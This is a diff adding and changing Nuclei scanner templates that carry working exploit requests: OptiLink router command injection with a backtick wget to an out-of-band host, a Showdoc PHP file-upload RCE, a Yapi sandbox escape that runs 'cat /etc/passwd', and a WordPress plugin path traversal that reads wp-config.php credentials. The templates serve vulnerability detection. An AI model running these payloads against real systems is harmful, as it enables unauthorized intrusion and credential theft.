description: vulnerabilities in the web-based management interface of OptiLink could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
|
||||||
|
reference: |
|
||||||
|
- https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html
|
||||||
|
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
|
||||||
|
tags: optiLink,rce,oob
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /boaform/admin/formTracert HTTP/1.1
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Origin: http://{{Hostname}}
|
||||||
|
Connection: keep-alive
|
||||||
|
Referer: http://{{Hostname}}/diag_ping_admin_en.asp
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User: e8c
|
||||||
|
Password: e8c
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
||||||
|
|
||||||
|
target_addr="1.1.1.1+`wget+http%3A%2F%2F{{interactsh-url}}%2F`"&waninf=127.0.0.1"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
|
words:
|
||||||
|
- "http"
|
|
@ -1,4 +1,5 @@
|
||||||
id: showdoc-file-upload-rce
|
id: showdoc-file-upload-rce
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Showdoc < 2.8.6 File Upload RCE
|
name: Showdoc < 2.8.6 File Upload RCE
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
|
@ -20,7 +21,7 @@ requests:
|
||||||
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
|
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
|
||||||
Content-Type: text/plain
|
Content-Type: text/plain
|
||||||
|
|
||||||
<?php phpinfo();?>
|
<?php echo md5('rce_test');?>
|
||||||
----------------------------835846770881083140190633--
|
----------------------------835846770881083140190633--
|
||||||
|
|
||||||
- |
|
- |
|
||||||
|
@ -37,11 +38,12 @@ requests:
|
||||||
regex:
|
regex:
|
||||||
- '/Uploads\\(.*?)"\,"success"'
|
- '/Uploads\\(.*?)"\,"success"'
|
||||||
|
|
||||||
req-condition: true
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: word
|
||||||
dsl:
|
words:
|
||||||
- 'contains(body_2, "PHP Extension")'
|
- '3c7cb9f46815a790686b857fdbc4295a'
|
||||||
- 'contains(body_2, "PHP Version")'
|
|
||||||
- 'status_code_2 == 200'
|
- type: status
|
||||||
condition: and
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,110 @@
|
||||||
|
id: yapi-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Yapi Remote Code Execution
|
||||||
|
author: pikpikcu
|
||||||
|
severity: critical
|
||||||
|
tags: yapi,rce
|
||||||
|
reference: |
|
||||||
|
- https://www.secpulse.com/archives/162502.html
|
||||||
|
- https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b
|
||||||
|
- https://twitter.com/sec715/status/1415484190561161216
|
||||||
|
- https://github.com/YMFE/yapi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- | # REQUEST 1
|
||||||
|
POST /api/user/reg HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Content-Length: 94
|
||||||
|
Content-Type: application/json;charset=UTF-8
|
||||||
|
Accept-Encoding: gzip
|
||||||
|
|
||||||
|
{"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"}
|
||||||
|
|
||||||
|
- | # REQUEST 2
|
||||||
|
GET /api/group/list HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Content-Type: application/json, text/plain, */*
|
||||||
|
Accept-Encoding: gzip
|
||||||
|
|
||||||
|
- | # REQUEST 3
|
||||||
|
POST /api/project/add HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Content-Length: 106
|
||||||
|
Content-Type: application/json;charset=UTF-8
|
||||||
|
Accept-Encoding: gzip
|
||||||
|
|
||||||
|
{"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"}
|
||||||
|
|
||||||
|
- | # REQUEST 4
|
||||||
|
GET /api/project/get?id={{project_id}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Accept-Encoding: gzip
|
||||||
|
|
||||||
|
- | # REQUEST 5
|
||||||
|
POST /api/interface/add HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Content-Length: 89
|
||||||
|
Content-Type: application/json;charset=UTF-8
|
||||||
|
Accept-Encoding: gzip
|
||||||
|
|
||||||
|
{"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}}
|
||||||
|
|
||||||
|
- | # REQUEST 6
|
||||||
|
POST /api/plugin/advmock/save HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Content-Length: 382
|
||||||
|
Content-Type: application/json;charset=UTF-8
|
||||||
|
Accept-Encoding: gzip
|
||||||
|
|
||||||
|
{"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true}
|
||||||
|
|
||||||
|
- | # REQUEST 7
|
||||||
|
GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Accept-Encoding: gzip
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: group_id
|
||||||
|
group: 1
|
||||||
|
internal: true
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- '"_id":([0-9]+),"group_name"'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: interface_id
|
||||||
|
group: 1
|
||||||
|
internal: true
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- '"req_body_form":\[\],"_id":([0-9]+)'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: project_id
|
||||||
|
group: 1
|
||||||
|
internal: true
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- '"tag":\[\],"_id":([0-9]+)'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0:"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: wp-memphis-documents-library-lfi
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Plugin Memphis Document Library 3.1.5 LFI
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: high
|
||||||
|
tags: wordpress,wp-plugin,lfi
|
||||||
|
description: Arbitrary file download in Memphis Document Library 3.1.5
|
||||||
|
reference: |
|
||||||
|
- https://www.exploit-db.com/exploits/39593
|
||||||
|
- https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/mdocs-posts/?mdocs-img-preview=../../../wp-config.php'
|
||||||
|
- '{{BaseURL}}/?mdocs-img-preview=../../../wp-config.php'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "DB_NAME"
|
||||||
|
- "DB_PASSWORD"
|
||||||
|
part: body
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -7,4 +7,6 @@ info:
|
||||||
tags: workflow
|
tags: workflow
|
||||||
|
|
||||||
workflows:
|
workflows:
|
||||||
- template: misconfiguration/aem/
|
- template: technologies/aem-detection.yaml
|
||||||
|
subtemplates:
|
||||||
|
- tags: aem
|
Loading…
Reference in New Issue